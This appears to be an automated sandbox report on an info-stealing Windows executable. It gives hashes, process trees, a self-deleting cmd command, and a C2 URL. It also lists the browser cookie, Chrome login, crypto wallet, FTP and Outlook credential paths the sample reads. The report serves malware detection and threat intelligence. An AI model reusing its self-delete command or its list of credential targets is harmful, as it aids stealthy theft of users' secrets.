· 6 years ago · Sep 03, 2019, 12:28 PM
1
2* ID: 784
3* MalFamily: "Malicious"
4
5* MalScore: 10.0
6
7* File Name: "Exes_3def155b4c3c49e69e2f76499de14034.exe"
8* File Size: 540672
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "db6309a594ea596569a878d8a692b83abe35aa33b2c2b39aa81615005c0d30ac"
11* MD5: "3def155b4c3c49e69e2f76499de14034"
12* SHA1: "72a9f61dcdbf43e2cb40f5fe171008c2aa70cc63"
13* SHA512: "28c221ebe2899034a902584eed7fb08b4341011c1e5cced3dc771451a95032807d1a49aac2ff259f4f97eed26d58767736387ff1a6a3c91b4699561e965f4ed8"
14* CRC32: "2C4801B7"
15* SSDEEP: "6144:SsJcPyFZfh/EkIafaUEl8GEnwwcTRvpM9/5V2MYfG6jqoHTshzjJ3gFKxrNVt3gr:SMLZ/gNdl8CB0WMYfPO1TrXtB"
16
17* Process Execution:
18 "fo1GrAw0yY7y3v.exe",
19 "fo1GrAw0yY7y3v.exe",
20 "cmd.exe",
21 "timeout.exe",
22 "services.exe",
23 "lsass.exe",
24 "WmiApSrv.exe",
25 "svchost.exe",
26 "svchost.exe",
27 "WMIADAP.exe",
28 "WmiPrvSE.exe"
29
30
31* Executed Commands:
32 "\"C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe\"",
33 "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\"",
34 "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\"",
35 "C:\\Windows\\system32\\lsass.exe",
36 "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
37 "C:\\Windows\\system32\\svchost.exe -k netsvcs",
38 "C:\\Windows\\system32\\timeout.exe 3"
39
40
41* Signatures Detected:
42
43 "Description": "Behavioural detection: Executable code extraction",
44 "Details":
45
46
47 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
48 "Details":
49
50
51 "Description": "Possible date expiration check, exits too soon after checking local time",
52 "Details":
53
54 "process": "fo1GrAw0yY7y3v.exe, PID 2200"
55
56
57
58
59 "Description": "Anomalous file deletion behavior detected (10+)",
60 "Details":
61
62 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp"
63
64
65 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp"
66
67
68 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp"
69
70
71 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp"
72
73
74 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp"
75
76
77 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
78
79
80 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
81
82
83 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll"
84
85
86 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll"
87
88
89 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll"
90
91
92 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll"
93
94
95 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll"
96
97
98 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll"
99
100
101 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll"
102
103
104 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll"
105
106
107 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll"
108
109
110 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll"
111
112
113 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll"
114
115
116 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll"
117
118
119 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll"
120
121
122 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll"
123
124
125 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll"
126
127
128 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll"
129
130
131 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll"
132
133
134 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll"
135
136
137 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll"
138
139
140 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll"
141
142
143 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll"
144
145
146 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll"
147
148
149 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll"
150
151
152 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll"
153
154
155 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll"
156
157
158 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll"
159
160
161 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll"
162
163
164 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll"
165
166
167 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll"
168
169
170 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll"
171
172
173 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll"
174
175
176 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll"
177
178
179 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll"
180
181
182 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll"
183
184
185 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll"
186
187
188 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll"
189
190
191 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll"
192
193
194 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll"
195
196
197 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll"
198
199
200 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll"
201
202
203 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll"
204
205
206 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll"
207
208
209 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll"
210
211
212 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll"
213
214
215 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll"
216
217
218 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll"
219
220
221 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll"
222
223
224 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll"
225
226
227 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe"
228
229
230
231
232 "Description": "Guard pages use detected - possible anti-debugging.",
233 "Details":
234
235
236 "Description": "Performs HTTP requests potentially not found in PCAP.",
237 "Details":
238
239 "url_ioc": "absetup8.icu:80//index.php"
240
241
242 "url_ioc": "absetup8.icu:80//index.php"
243
244
245
246
247 "Description": "A process created a hidden window",
248 "Details":
249
250 "Process": "fo1GrAw0yY7y3v.exe -> C:\\Windows\\System32\\cmd.exe"
251
252
253
254
255 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
256 "Details":
257
258 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
259
260
261 "suspicious_request_iocs": "http://absetup8.icu/index.php"
262
263
264
265
266 "Description": "Performs some HTTP requests",
267 "Details":
268
269 "url_iocs": "http://absetup8.icu/index.php"
270
271
272
273
274 "Description": "Uses Windows utilities for basic functionality",
275 "Details":
276
277 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
278
279
280 "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
281
282
283
284
285 "Description": "Behavioural detection: Injection (Process Hollowing)",
286 "Details":
287
288 "Injection": "fo1GrAw0yY7y3v.exe(2200) -> fo1GrAw0yY7y3v.exe(788)"
289
290
291
292
293 "Description": "Executed a process and injected code into it, probably while unpacking",
294 "Details":
295
296 "Injection": "fo1GrAw0yY7y3v.exe(2200) -> fo1GrAw0yY7y3v.exe(788)"
297
298
299
300
301 "Description": "Deletes its original binary from disk",
302 "Details":
303
304
305 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
306 "Details":
307
308 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 1896668 times"
309
310
311
312
313 "Description": "Steals private information from local Internet browsers",
314 "Details":
315
316 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
317
318
319 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
320
321
322 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
323
324
325 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
326
327
328 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
329
330
331 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
332
333
334 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
335
336
337 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
338
339
340 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
341
342
343 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
344
345
346 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
347
348
349 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
350
351
352 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
353
354
355 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
356
357
358 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
359
360
361 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
362
363
364 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
365
366
367 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
368
369
370 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
371
372
373 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
374
375
376
377
378 "Description": "Collects information about installed applications",
379 "Details":
380
381 "Program": "Google Update Helper"
382
383
384
385
386 "Program": "Microsoft Excel MUI 2013"
387
388
389 "Program": "Microsoft Outlook MUI 2013"
390
391
392
393
394 "Program": "Google Chrome"
395
396
397 "Program": "Adobe Flash Player 29 NPAPI"
398
399
400 "Program": "Adobe Flash Player 29 ActiveX"
401
402
403 "Program": "Microsoft DCF MUI 2013"
404
405
406 "Program": "Microsoft Access MUI 2013"
407
408
409 "Program": "Microsoft Office Proofing Tools 2013 - English"
410
411
412 "Program": "Adobe Acrobat Reader DC"
413
414
415 "Program": "Microsoft Publisher MUI 2013"
416
417
418 "Program": "Microsoft Office Shared MUI 2013"
419
420
421 "Program": "Microsoft Office OSM MUI 2013"
422
423
424 "Program": "Microsoft InfoPath MUI 2013"
425
426
427 "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
428
429
430 "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
431
432
433 "Program": "Microsoft Word MUI 2013"
434
435
436 "Program": "Microsoft OneDrive"
437
438
439 "Program": "Microsoft Groove MUI 2013"
440
441
442 "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
443
444
445
446
447 "Program": "Microsoft Access Setup Metadata MUI 2013"
448
449
450 "Program": "Microsoft Office OSM UX MUI 2013"
451
452
453 "Program": "Java Auto Updater"
454
455
456 "Program": "Microsoft PowerPoint MUI 2013"
457
458
459 "Program": "Microsoft Office Professional Plus 2013"
460
461
462 "Program": "Adobe Refresh Manager"
463
464
465 "Program": "Microsoft Office Proofing 2013"
466
467
468 "Program": "Microsoft Lync MUI 2013"
469
470
471
472
473 "Program": "Microsoft OneNote MUI 2013"
474
475
476
477
478 "Description": "Stack pivoting was detected when using a critical API",
479 "Details":
480
481 "process": "svchost.exe:700"
482
483
484
485
486 "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
487 "Details":
488
489 "FireEye": "Generic.mg.3def155b4c3c49e6"
490
491
492 "McAfee": "Packed-FVG!3DEF155B4C3C"
493
494
495 "CrowdStrike": "win/malicious_confidence_90% (W)"
496
497
498 "Invincea": "heuristic"
499
500
501 "Cyren": "W32/VBKrypt.SQ.gen!Eldorado"
502
503
504 "APEX": "Malicious"
505
506
507 "Kaspersky": "UDS:DangerousObject.Multi.Generic"
508
509
510 "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.hh"
511
512
513 "Trapmine": "suspicious.low.ml.score"
514
515
516 "SentinelOne": "DFI - Suspicious PE"
517
518
519 "Endgame": "malicious (high confidence)"
520
521
522 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
523
524
525 "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
526
527
528 "Acronis": "suspicious"
529
530
531 "Cylance": "Unsafe"
532
533
534 "Cybereason": "malicious.dcdbf4"
535
536
537 "Qihoo-360": "HEUR/QVM03.0.A059.Malware.Gen"
538
539
540
541
542 "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
543 "Details":
544
545
546 "Description": "Attempts to access Bitcoin/ALTCoin wallets",
547 "Details":
548
549 "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
550
551
552 "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
553
554
555 "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
556
557
558 "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
559
560
561 "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
562
563
564 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
565
566
567 "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
568
569
570 "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
571
572
573 "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
574
575
576 "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
577
578
579 "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
580
581
582 "file": "C:\\Users\\user\\AppData\\wallet.dat"
583
584
585 "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
586
587
588 "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
589
590
591 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
592
593
594 "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
595
596
597 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
598
599
600
601
602 "Description": "Harvests credentials from local FTP client softwares",
603 "Details":
604
605 "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
606
607
608
609
610 "Description": "Harvests information related to installed instant messenger clients",
611 "Details":
612
613 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
614
615
616
617
618 "Description": "Harvests information related to installed mail clients",
619 "Details":
620
621 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
622
623
624 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
625
626
627 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
628
629
630 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
631
632
633 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
634
635
636 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
637
638
639 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
640
641
642 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
643
644
645 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
646
647
648 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
649
650
651 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
652
653
654 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
655
656
657 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
658
659
660 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
661
662
663 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
664
665
666 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
667
668
669 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
670
671
672 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
673
674
675 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
676
677
678 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
679
680
681 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
682
683
684
685
686 "Description": "Collects information to fingerprint the system",
687 "Details":
688
689
690 "Description": "Uses suspicious command line tools or Windows utilities",
691 "Details":
692
693 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
694
695
696 "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
697
698
699
700
701
702* Started Service:
703 "VaultSvc",
704 "wmiApSrv"
705
706
707* Mutexes:
708 "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
709 "Global\\RefreshRA_Mutex_Lib",
710 "Global\\RefreshRA_Mutex",
711 "Global\\RefreshRA_Mutex_Flag",
712 "Global\\WmiApSrv",
713 "Global\\ADAP_WMI_ENTRY"
714
715
716* Modified Files:
717 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
718 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
719 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
720 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
721 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
722 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
723 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
724 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
725 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
726 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
727 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
728 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
729 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
730 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
731 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
732 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
733 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
734 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
735 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
736 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
737 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
738 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
739 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
740 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
741 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
742 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
743 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
744 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
745 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
746 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
747 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
748 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
749 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
750 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
751 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
752 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
753 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
754 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
755 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
756 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
757 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
758 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
759 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
760 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
761 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
762 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
763 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
764 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
765 "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp",
766 "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp",
767 "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp",
768 "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp",
769 "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp",
770 "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
771 "\\??\\WMIDataDevice",
772 "\\??\\PIPE\\samr",
773 "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
774 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
